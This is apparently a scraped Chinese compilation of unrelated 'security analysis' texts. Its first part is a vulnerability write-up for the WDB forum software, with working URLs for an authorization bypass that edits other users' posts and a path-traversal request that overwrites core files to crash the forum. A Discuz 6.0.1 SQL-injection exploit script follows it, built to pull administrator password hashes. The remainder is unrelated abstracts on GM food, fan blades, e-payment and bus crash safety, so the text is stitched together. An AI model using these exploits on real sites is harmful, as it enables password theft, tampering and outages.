下面是小编帮大家整理的水晶论坛(WDB)安全性分析(共含7篇),希望对大家有所帮助。同时,但愿您也能像本文投稿人“南野陽子”一样,积极向本站投稿分享好文章。
生活真的很有意思,当你觉得一切顺利得让你满意得不能再满意的时候,那么你的不幸可能很快就会来了,而当你觉得你的生活中充斥着不幸,很多事情不断得使你感到痛苦甚至畏惧的时候,事态却突然转变,一切恢复到了以往的平静。当自己觉得一切异乎寻常的顺利或者经受着生活给我那“非常痛苦”的时候,我就会逼着自己去读一些代码,读代码的时候可以感受到平和,平和的思考问题,平和的处理事情。于是就有了这篇文章。
Wdbpost.php逻辑错误
这个漏洞可以导致攻击者可以修改任意用户的的贴子,下面来看详细分析:
1.涉及版本和平台。
受影响版本:水晶论坛(WDB)的当前所有版本。
受影响操作系统:Windows、Freebsd、Linux(我只测试了这三种操作系统,有兴趣的朋友可以自行测试)。
2.漏洞分析。
由于wdbpost.php文件中存在变量未初始化,导致恶意攻击者绕过wdbpost.php的验证,任意修改编辑别人的贴子。我们来看一下相关的代码:
=======codz begin======
488 if ($action==“modify”) {
......
//------Check if the user got the right to modify--------
499 if ($login_status==1 && ($author==$username || $username==$admin_name || ($login_status==1 && ($forum_admin && in_array($username,
450 $forum_admin))))) $check_user=1;
451
452 if ($check_user==0) { //check_user没有初始化!可以直接定义!
453 $status=“您没有权利修改该贴,请您以合适的身份登录(文章原作者 或者 管理员)”;
454 include(“header.php”);
455 navi_bar($navi_bar_des,$navi_bar_l2,“发生错误”);
456 print_err;
457 include(“footer.php”);
458 exit;
459 }
=======codz ends=========
我们一句一句来读一下看看:当$action等于modify的时候,如果$login_status==1,$login_status这个变量是检查是否登陆,并且当发贴者($author)等于现在的$username或者username等于管理员的名字(admin_user),或者是斑竹($forum_admin && in_array($username,$forum_admin),如果满足这几个条件,那么设定$check_user这个变量等于1,后面就轻松了,如果$check_user这个变量不等于1,那么就说明你没有编辑的权利。到了这里,我们顺着程序员的思路走一遍,觉得没什么问题,一切都很正常,限定的也很严格,真的是这样么?
我们注意到,如果他所规定的条件全部满足的话,那么$check_user=1,后面则检查这个变量是不是为0。我们把这个文件从头看一遍,发现前面并没有定义$check_user这个变量的值,要是我们来设定的话,是不是就可以绕过他的层层检查了呢?
我们来试试看,直接提交:
127.0.0.1/myhome/wdb/wdbpost.phpaction=modify&forumid=5&filename=f_366&article=0&check_user=1
注意这里我直接设定check_user=1。
我们看到了修改的画面,一切都那么顺利,总觉得有点不对劲,修改提交一下看看。
报错!刚才的欣喜一下子被冲淡了,再次拿起代码往下读:
=======codz begin=======
520 elseif($step==2) {
521 if (!$usericon) $usericon=$oldicon;
522 //----Check-------
523 $check=check_data();
524 if ($check) {
$timeedit=getfulldate($timestamp);
$articlecontent=$articlecontent.“
[此贴被”.$username.“在”.$timeedit.“动过手脚]”;
$articlecontent=str_replace(“ ”,“ ”,$articlecontent);
$articlecontent=stripslashes($articlecontent); $articletitle=stripslashes($articletitle);
$articletitle=str_replace(“,”,“,”,$articletitle); $articletitle=safe_convert($articletitle);
......
=======codz ends========
我们注意到那个check_data()的函数看起来比较可疑,拿出来看看,这个函数在post_global.php文件中,翻出这个文件:
=======codz begin=======
350 function check_data(0=“post”) {
351 global
352 $articlecontent,$max_post_length,$articletitle,$status,$articledes,$selections,$title,
353 $by,$address,$downaddress,$file_size,$logourl;
354 $check=1;
355 if (strlen($articlecontent)>=$max_post_length) {$status=“文章超过管理员指定的长度”; $check=0;}
356 if (empty($articletitle)) {$status=“没有填写标题”; $check=0;}
357 elseif (strlen($articletitle)>=80) {$status=“标题太长了”; $check=0;}
358 if (strlen($articledes)>=80) {$status=“文章描述太长了”; $check=0;}
359 if (0==“vote” && empty($selections)) {$status=“不接受空选项”; $check=0;}
......
=======codz ends========
这个函数是检查文章的标题和内容是否为空,长度是否超过指定的长度。从这里看我们要直接提交修改的内容和题目,直接在URL中提交:
127.0.0.1/myhome/wdb/wdbpost.php?action=modify&forumid=5&filename=f_366&article=0&check_user=1&step=2&articletitle=hello,I am Jambalaya&articlecontent=I am from www.itaq.org
其中$articletitle是我们修改的文章标题,$articlecontent是我们修改的文章内容。提交后贴子标题就被改成了“hello,I am Jambalaya。”,而内容则是“I am from www.itaq.org”,
buy.php变量过滤不严
这个变量过滤不严格可以直接导致DOS攻击,我们来看详细分析:
测试环境:windows+IIS5(其他没有测试,有兴趣的朋友可以自行测试一下)。
这个文件的问题我一直不想写,不是因为这个漏洞有多严重,而是我觉得这个文件应该可以向里面写入一个Shell而并不仅仅是一个DOS,可是在N次的失败后,自己也迷茫了,继续研究下去需要时间和精力,而这些正是我现在没有的,于是写出来给大家看看,
谁有解决的方法或者认为根本无法写入Shell的理由,希望不吝赐教一下!
由于buy.php文件对变量没有严格过滤,导致可以向任何文件写入垃圾信息导致DOS攻击,严重者可以使整个论坛瘫痪!我们来看一下相关的代码:
=======codz begin=======
17 if (!file_exists(“$id_unique/$buyer”)||!file_exists(“{$idpath}forum$forumid/$filename”)||$buyer!=$username||
18 $buyer==$seller||$sellmoney>100||$sellmoney<0) {
19 msg_box('购买贴子','
状态:发生错误,不要黑我啊
返回前页
20
现在登录
');exit;}
21 if (!file_exists(“$id_unique/$seller”)) {
22 msg_box('购买贴子','
状态:发生错误,出售贴子的人已经注销了~
返回前页
现在登录
');
24 exit;}
25 $useri=get_user_info($buyer);
26 $userii=get_user_info($seller);
27 if($useri[23]<$sellmoney)
28 {
29 echo $useri[23];
30 echo $sellmoney;
31 msg_box('购买贴子','
状态:有没有搞错,你的哪来那么多钱???多灌点水吧,要不就去赌馆碰碰运气
32 ~
返回前页
重新登录
32
');
33 exit;
34 }
35
36 $useri[23]=$useri[23]-$sellmoney;
37 $uu=implode('|',$useri);
38 writetofile(“$id_unique/$buyer”,$uu);
39
40 $userii[23]=$userii[23]+$sellmoney;
41 $uuu=implode('|',$userii);
42 writetofile(“$id_unique/$seller”,$uuu);
========codz ends========
代码有些长,不过很简单。老规矩,我们一句句的看一下:他首先检查购买者是否存在,然后检查你买的那个文件是不是也存在,然后检查买贴子的人名字是不是你现在使用的用户,再然后确定买贴子的人不能是卖贴子的人,并且出售的钱不能大于100,或者小于0。如果上面的一个条件不符合,则报错。这就是检查机制,说起来觉得很累,并且咋看起来似乎检查得很严,检查得的确很严,可惜没检查到位,我们继续往下看。
后面有一个函数来读取用户的信息get_user_info(),我们先来看一下这个函数的:
=======codz begin========
14 function get_user_info($user) {
15 global $id_unique;
15 if(!file_exists(“$id_unique/$user”)||$user==“.”||$user==“..”||$user==“”) return 0;
16 $useri=explode(“|”,readfromfile(“$id_unique/$user”));
17 return $useri;
18 }
========codz ends========
他检查了是否存在这个用户,然后要求用户不能是“.”、“..”这些特殊字符,过滤这些就够了么?显然是不够的。好了,这些都明确了,我们构造我们的语句,如何构造呢?前面的代码对$seller这个值一点都没有做检查,我们就用从这里下手吧。设seller=../ads.php,因为是post提交的,所以先用NC抓个包看看,得到结果:
POST /myhome/wdb/buy.php HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, */*
Referer: 127.0.0.1/myhome/wdb/wdbread.php?forumid=1&filename=f_14
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Host: 127.0.0.1
Content-Length: 57
Connection: Keep-Alive
Cookie: lastvisit=978449234; wdbadminid=Jambalaya; wdbadminpwd=3028879ab8d5c87dc023049fa5bb5c1a; s=186a44d9c20358034ed9fdb7a038a60c
sellmoney=2&buyer=tombkeeper&seller=Jambalaya&forumid=1&filename=f_14
我用tombkeeker这个id来买帖子(tombkeeper不会找我要版权吧?),我们把seller的名字改一下,改成../ads.php,再用NC提交,显示提交成功!访问一下ads文件,已经访问不了了。现在只是这一个文件不能访问而已,我们怎么能让整个论坛瘫痪呢?其实我们应该注意到,有几个重要文件是很多文件在代码开始的时候都要include的,如果include失败,那么文件也就不能解释执行了,是不是有点釜底抽薪的味道?这种文件有:
datafile/superadmin.php
config.php
global.php
这几个文件是经常在代码开始的时候被include。好,让我们试试datafile/superadmin.php这个文件,同样把seller改成../datafile/superadmin.php,改了变量,用NC提交,返回的信息告诉我失败!当时的感觉就像一盆冷水倾头而下,自己冷静了一下,弄了杯凉白开(我最喜欢喝的东西),两眼盯着屏幕开始发呆。
当问题发生的时候,考虑问题的方法就显得特别重要,首先我假设是我代码没看仔细,于是翻过头来又看了一遍代码,似乎没有什么地方有问题,说明不是代码的问题。反复提交了N次后,在第N+1次的时候发现问题了!我提交的../datafile/superadmin.php神奇地变成了../datafile/su,后面的东西都没有了,找到发生问题的地方了,轻轻的吐了口气,那么后面该怎么做呢?我注意到了NC得到的这行返回信息:Content-Length: 57,我觉得百分之九十应该是长度问题。试试看,把提交的长度57改成了70,再次提交!好了,成功了!Ladys and gentlemans, We got it!(此处转自《萨**历险记》)。
回头看看论坛,已经不能访问了。这里只是举个例子,如果攻击者心狠手辣的话,写个程序往所有重要文件里写入垃圾数据并且将其写满也不是不可以的,所以才叫DOS嘛!
文章写到这里基本上就可以结束了,后面就是我测试失败的地方,其实我却觉得应该可以实现的,时间和精力都没有的时候,我还是写出来给大家讨论吧:如果大家仔细读一下代码就可以发现,其实$sellmoney这个变量也没有定义,并没有定义这个变量一定要是数值型,而对于PHP这种松散的语法类型来说,如果我提交的是字符串,则会自动转换成数值0,我们来从头看一下代码:程序进行了几次比对,然后将其写入文件,如果我们将$sellmoney定义为php的语句是不是可以写入文件然后调用解释执行呢?后面的东西这里不去详述了,省得哪位小编哥哥说我有骗稿费的嫌疑。
文章已经写完了,逻辑错误和思维定式是所有论坛都会存在的问题。不是没有漏洞,只是你没有看到而已。PHP编译器的确用了很多保护方法,但是代码本身的不安全性就像一颗深埋的炸弹一样――总有一天会暴露出来,只不过是时间问题罢了。
漏洞说明:Discuz 论坛系统 是一套采用php+mysql数据库方式运行,在其中发现了一个安全漏洞,成功利用此漏洞可以提取管理员的密码进入后台,取得管理员权限,
漏洞厂商:www.discuz.net
漏洞解析:在Discuz的wap模块中的字符转码程序存在问题,在discuz的wap模块中,该编码转换类存在严重的问题。在Discuz中,wap是默认开启的,很容易被攻击者利用,这个问题存在与discuz所有版本中。
在discuz代码中存在多处可利用的地方,如:pm.inc.php/search.inc.php等,下面给出可疑代码片段:
pm.inc.php:
$floodctrl = $floodctrl * 2;
if($floodctrl && !$disablepostctrl && $timestamp - $lastpost < $floodctrl) {
wapmsg(’pm_flood_ctrl’);
}
if($formhash != formhash()) {
wapmsg(’wap_submit_invalid’);
}
$member = $db->fetch_first(”SELECT m.uid AS msgtoid, mf.ignorepm FROM {$tablepre}members m
LEFT JOIN {$tablepre}memberfields mf USING (uid)
WHERE username=’$msgto’”);
if(!$member) {
wapmsg(’pm_send_nonexistence’);
}
if(preg_match(”/(^{ALL}$|(,|^)s*”.preg_quote($discuz_user, ‘/’).”s*(,|$))/i”, $member['ignorepm'])) {
wapmsg(’pm_send_ignore’);
}
if(empty($subject) || empty($message)) {
wapmsg(’pm_sm_isnull’);
}
search.inc.php:
if(isset($searchid)) {
$page = max(1, intval($page));
$start_limit = $number = ($page - 1) * $waptpp;
$index = $db->fetch_first(”SELECT searchstring, keywords, threads, tids FROM {$tablepre}searchindex WHERE searchid=’$searchid’”);
if(!$index) {
wapmsg(’search_id_invalid1′);
}
$index['keywords'] = rawurlencode($index['keywords']);
$index['searchtype'] = preg_replace(”/^([a-z]+)|.*/”, “1“, $index['searchstring']);
$searchnum = $db->result_first(”SELECT COUNT(*) FROM {$tablepre}threads WHERE tid IN ($index[tids]) AND displayorder>=’0′”);
if($searchnum) {
echo “
$lang[search_result]
”;
$query = $db->query(”SELECT * FROM {$tablepre}threads WHERE tid IN ($index[tids]) AND displayorder>=’0′ ORDER BY dateline DESC LIMIT $start_limit, $waptpp”);
while($thread = $db->fetch_array($query)) {
echo “#”.++$number.” “.cutstr($thread['subject'], 24).”($thread[views]/$thread[replies])
n”;
}
echo wapmulti($searchnum, $waptpp, $page, “index.php?action=search&searchid=$searchid&do=submit&sid=$sid”);
echo ‘
’;
} else {
wapmsg(’search_invalid’);
}
以下是search.inc.php 文件漏洞利用代码;
注:以下漏洞纯属个人兴趣爱好,仅供大家参考
error_reporting(E_ALL&E_NOTICE);
print_r(”
+——————————————————————+
Exploit discuz6.0.1
Just work as php>=5 & mysql>=4.1
BY 冰封浪子&小志
+——————————————————————+
“);
if($argc>4)
{
$host=$argv[1];
$port=$argv[2];
$path=$argv[3];
$uid=$argv[4];
}else{
echo “Usage: php “.$argv[0].” host port path uidn”;
echo “host: target server n”;
echo “port: the web port, usually 80n”;
echo “path: path to discuzn”;
echo “uid : user ID you wanna getn”;
echo “Example:rn”;
echo “php “.$argv[0].” localhost 80 1n”;
exit;
}
$content =”action=search&searchid=22%cf’UNION SELECT 1,password,3,password/**/from/**/cdb_members/**/where/**/uid=”.$uid.”/*&do=submit”;
$data = “POST /”.$path.”/index.php”.” HTTP/1.1rn”;
$data .= “Accept: */*rn”;
$data .= “Accept-Language: zh-cnrn”;
$data .= “Content-Type: application/x-www-form-urlencodedrn”;
$data .= “User-Agent: waprn”;
$data .= “Host: “.$host.”rn”;
$data .= “Content-length: “.strlen($content).”rn”;
$data .= “Connection: Closern”;
$data .= “rn”;
$data .= $content.”rnrn”;
转基因动物性食品安全性分析
转基因食品舍有新的遗传物质和蛋白质,这些新的遗传物质将会对人类健康及环境产生怎样的影响引起了世界各国极大关注.文章介绍了转基因动物性食品的'概念,对转基因动物性食品的安全性问题进行了初步探讨,并对转基因食品的前景进行了展望.
作 者:刘凌云 LIU Lingyun 作者单位:昆明学院,昆明,650202 刊 名:饲料博览 英文刊名:FEED REVIEW 年,卷(期): “”(10) 分类号:Q789 TS201.6 S872 S873 关键词:转基因 动物 食品 安全性通风机叶片振动安全性分析
摘要:针对传统的`叶片振动安全性调频分析方法的4种局限性,提出了一种叶片振动安全性动应力分析法.该方法可在实际动载荷未知的情况下,进行叶片动应力及叶片振动安全性分析.本文介绍了叶片振动安全性动应力分析法的特点,并通过实例说明了该方法的可行性. 作者: 陈杰[1] 沈荣瀛[2] 华宏星[2] 罗建平[3] Author: CHEN Jie[1] SHEN Rong-ying[2] HUA Hong-xing[2] LUO Jian-ping[3] 作者单位: 上海交通大学核电技术与装备工程研究中心,30;上海交通大学振动冲击噪声实验室,200030上海交通大学振动冲击噪声实验室,200030上海交通大学上风高科工程技术中心,200030 期 刊: 核动力工程 ISTICEIPKU Journal: NUCLEAR POWER ENGINEERING 年,卷(期): , 27(5) 分类号: HT11 关键词: 通风机 叶片振动 安全分析 动应力 机标分类号: TM8 O34 机标关键词: 通风机 叶片振动 安全性分析 动应力 力分析法 分析方法 局限性 动载荷 调频 基金项目: 通风机叶片振动安全性分析[期刊论文] 核动力工程 --2006, 27(5)陈杰 沈荣瀛 华宏星 罗建平针对传统的叶片振动安全性调频分析方法的4种局限性,提出了一种叶片振动安全性动应力分析法.该方法可在实际动载荷未知的情况下,进行叶片动应力及叶片振动安全性分析.本文介绍了叶片振动安全性动应力分析法的特点,并通过...电子商务支付手段安全性分析
[摘要] 电子支付手段是电子商务的核心环节,是其成败的关键,本文主要讨论了电子商务的几种不同的支付方式,并对各种不同的支付方式的安全性进行了分析。 [关键词] 电子商务支付手段安全一、前言电子商务全球化的发展趋势中,电子商务交易的信用危机也悄然袭来,虚假交易、假冒行为、合同诈骗、侵犯消费者合法权益等各种违法违规行为屡屡发生,这些现象在很大程度上制约了我国电子商务乃至全球电子商务快速、健康发展。限制电子商务的发展主要因素就是电子支付手段的安全性。二、主要的电子支付手段及其安全性分析1.电子信用卡 (1)支付方式:信用卡支付是电子支付中最常用的工具,方法是在Internet环境下通过标准的SET协议进行网络支付,用户在网上发送信用卡号和密码,加密后发送到银行进行支付。 支付过程中要进行用户、商家及付款要求的合法性验证。 (2)安全策略:电子信用卡,是通过用户在网上输入账号/密码+数字签名,这些信息都是通过SET或者SSL协议的支付网关平台直接与银行进行相关支付信息的安全交互,进行网络支付,这种支付方式的安全性是可以得到保证的。 (3)安全隐患:单纯从技术上来说,无安全隐患问题。2.电子支票 (1)支付方式:电子支票是利用数字化手段进行网上支付,支付过程与传统支票的支付过程相似,只是电子支票完全抛开了纸质的媒介,其支票的形式是通过网络传播,并用数字签名代替了传统的签名方式。其交易流程如下: (2)安全策略:和电子信用卡一样,采用账号/密码+数字签名的方式进行身份验证。 其支付目前一般是通过专用网络、设备、软件及一套完整的用户识别、标准报文、数据验证等规范化协议完成数据传输,从而控制安全性,从上面的交易流程,我们可以看到,电子支票的支付在专用系统上有可靠的安全措施的。 (3)安全隐患:专用网络上的应用具有成熟的模式(例如SWIFT(环球银行金融通讯协会、Society for Worldwide Interbank Financial Telecommunication)系统);公共网络上的点的资金转账仍在实验之中。3.电子现金 (1)支付方式:电子现金是一种以数字化形式存在的现金货币,它同信用卡不一样,信用卡本身并不是货币,只是一种转账手段,而电子现金本身就是一种货币,是一种以数据形式存在的现金货币。它把现金数值转换成为一系列的加密序列数,通过这些序列数来表示现实中各种金额的币值。可以直接用来购物。电子现金具有如下特点:匿名;节省交易费用;支付灵活方便;安全存储。 (2)安全策略:没有适当的身份认证机制,是匿名的.,为防止被伪造,电子现金的传输是经过数字签名的。 (3)安全隐患:①逃税:由于电子现金可以实现跨国交易,税收和洗钱将成为潜在的问题。电子现金不像真实的现金一样,流通时不会留下任何记录,税务部门很难追查,所以即使将来调整了国际税收规则,由于其不可跟踪性,电子现金很可能被不法分子用以逃税。 ②洗钱:电子现金使洗钱也变得很容易。因为利用电子现金可以将钱送到世界上的任何地方而不留痕迹,如果调查机关想要获取证据,需要检查网上所有的数据并破译所有的密码,这几乎是不可能的。目前惟一的办法是建立一定的密钥托管机制,使政府在一定条件下能够获得私人的密钥,而这又会损害客户的隐私权,但作为预防洗钱等违法行为的措施,许多国家已经开始了这种做法。 ③扰乱金融秩序:电子现金的法律地位一直难以确定。这是因为按照货币的实质和网络无国界性来推断,各国中央银行的地位都将受到挑战,因为任何一个有实力、有信誉的全球性公司,都可以发行购买其产品或服务的数字化等价物,从而避开银行的繁琐手续和税收。而这会扰乱一国的金融秩序,任何国家都不会允许。 ④重复消费:由于电子序列号可以被复制,因此需要一个大型的数据库存储用户完成的交易和E-Cash序列号以防止重复消费,这对于软件和硬件的要求都很高,因此很多银行都不支持电子现金业务。4.移动支付 (1)支付方式: 移动支付系统将为每个移动用户建立一个与其手机号码关联的支付账户,为移动用户提供了一个通过手机进行交易支付和身份认证的途径。用户通过拨打电话、发送短信或者使用WAP功能接入移动支付系统,移动支付系统将此次交易的要求传送给MASP,由MASP确定此次交易的金额,并通过移动支付系统通知用户,在用户确认后,付费方式可通过多种途径实现,如直接转入银行、用户电话账单或者实时在专用预付账户上借记,这些都将由移动支付系统来完成。 (2)安全措施:身份验证方式采用个人账号/密码的方式。对交易中的部分敏感信息进行了加密。 (3)安全隐患:①抵赖行为:手机支付的加密方式只是加密了交易过程的部分内容,没有考虑交易双方相互的身份认证和交易的不可否认性,必须把SET协议数据加密模型引入到手机支付电子商务支付手段安全性分析中。②手机本身的安全性:手机支付还有其他的问题:大部分手机不具有用户身份认证模块,运算能力低,速度慢,不合适使用数字水印,由于不能进行很好的加密,而且手机信息传输是无线的,所以目前手机支付就存在比较大的安全隐患。三、结论以上所有的支付方式,都不能完全保证支付的安全性,因为协议本身也有不安全的因素。为了更进一步的加强支付的安全性,必须提供更好的中介服务来支持,用户预定商品后,向中间机构支付现金或者支票,卖家把货物送到中间机构,中间机构检测卖家货物是不是符合要求,再把货物转给买家,买家确认后,付款给卖家,这样,更好的保证买方的利益。尽管电子支付还存在很多问题(其中主要是安全和信任问题),但作为电子商务的中心环节,其发展趋势是不可阻挡的,关键是从立法和技术两方面进行逐步完善。
客车正面碰撞安全性仿真分析
根据所建立的客车有限元模型,进行其正面碰撞仿真分析.针对客车前部吸能区短、发生正面碰撞时吸能效果差的特点,提出在客车前部增加吸能模块的设计方案.仿真结果表明,前部吸能模块能吸收大部分碰撞能量,使整车的耐撞性能提高,使乘员的'损伤风险降低,表明所提出的改进方案是有效的.
作 者:张建 范体强 何汉桥 ZHANG Jian FAN Ti-qiang HE Han-qiao 作者单位:张建,ZHANG Jian(郑州宇通客车股份有限公司,郑州,450016)范体强,FAN Ti-qiang(中国汽车工程研究院,汽车产品研发中心,重庆,400039)
何汉桥,HE Han-qiao(湖南大学,汽车车身先进设计制造国家重点实验室,长沙,410082)
刊 名:客车技术与研究 英文刊名:BUS TECHNOLOGY AND RESEARCH 年,卷(期): 33(3) 分类号:U467.1+4 关键词:客车 正面碰撞 安全性 仿真分析转基因食品就是指利用现代分子生物技术,把动植物的基因加以改变,再制造出具备新特征的食品种类。其优点显著,但转基因食品存在很多不容忽视的存在的或潜在的危害性。
新基因的转入,打破了原来生物基因的“管理体制”,使一些产生毒素的沉默基因开启,产生有毒物质。有资料证实,转基因食品可能导致生物体系统失调、诱发癌症并传递给下一代,此过程可能需要30年或更长的时间。人为转入外源基因极有可能使原有的基因发生缺失和错码等突变。美国生产的一种耐除草剂转基因大豆的抗癌成分异黄酮就比一般大豆低12%~14%。
全世界约有2%的人群对某些食品产生过敏性反应。1996年美国先锋种子公司将巴西坚果某基因转入大豆中,结果对巴西坚果过敏的人群也对该大豆过敏,该大豆种子最终没有被批准商业化生产。人们在食用了这种改良食物后,食物会在人体内将抗药性基因传给致病细菌,使人体产生抗药性。在英国,做过切除大肠组织手术的志愿者,食用过用转基因大豆做成的汉堡包之后,在其小肠肠道的细菌中检测到了转基因DNA的残留物。而转基因食品对人体健康的严重影响,可能需要经过较长时间才能逐渐表现和检测出来。
很多转基因生物具有较强的生存能力或抗逆性,这样的生物一旦进入环境中,将会取代原来的作物,造成物种灭绝,但这种问题可能要经过许多年后才能显现出来。如一些盐碱、沼泽、雨林及有寄生虫的地区,以前原本不适合农业种植,这些地区都被用来种植农作物,从而使原本生活在这里的生物的栖息地遭到破坏,造成生态系统失衡,最终导致物种退化、减少甚至灭绝。
转基因生物将增强目标害虫的抗性。专家警告,如果这种具有转基因抗性的害虫变成具有抵抗性的超级害虫,就需要喷洒更多的农药,而这将会对农田和自然生态环境造成更大的危害。由于转基因作物特性优良,很多人选择种植转基因作物,使某些作物的多样性大大降低。保持生物多样性是减少生物遭受疫病侵袭的重要方式。1864年的爱尔兰马铃薯枯死病,造成100多万人死亡,数百人流离失所,原因就是当地人只种植两个土豆品种。
转基因作物可能将其抗性基因杂交传递给其野生亲缘种,从而使本是杂草的野生亲缘种变为无敌杂草。基因漂移的过程很难人为控制,其后果也难以预测。在加拿大,被用于试验的油菜,只具有抗草甘膦、抗草胺膦和抗咪唑啉酮功能中的一种功能,后来发现了同时具备这三种功能的油菜,说明这三种油菜之间产生了杂交,这种油菜对周围植物造成了很大影响。
(选自朱世明《转基因食品安全性分析》,有改动)
★ 水晶小天鹅说明文
★ 水晶童话作文
★ 水晶年华作文
★ 水晶初三作文
★ 范文论坛
★ 论坛策划书
★ 论坛欢迎词
★ 论坛主持词
★ 教学论坛
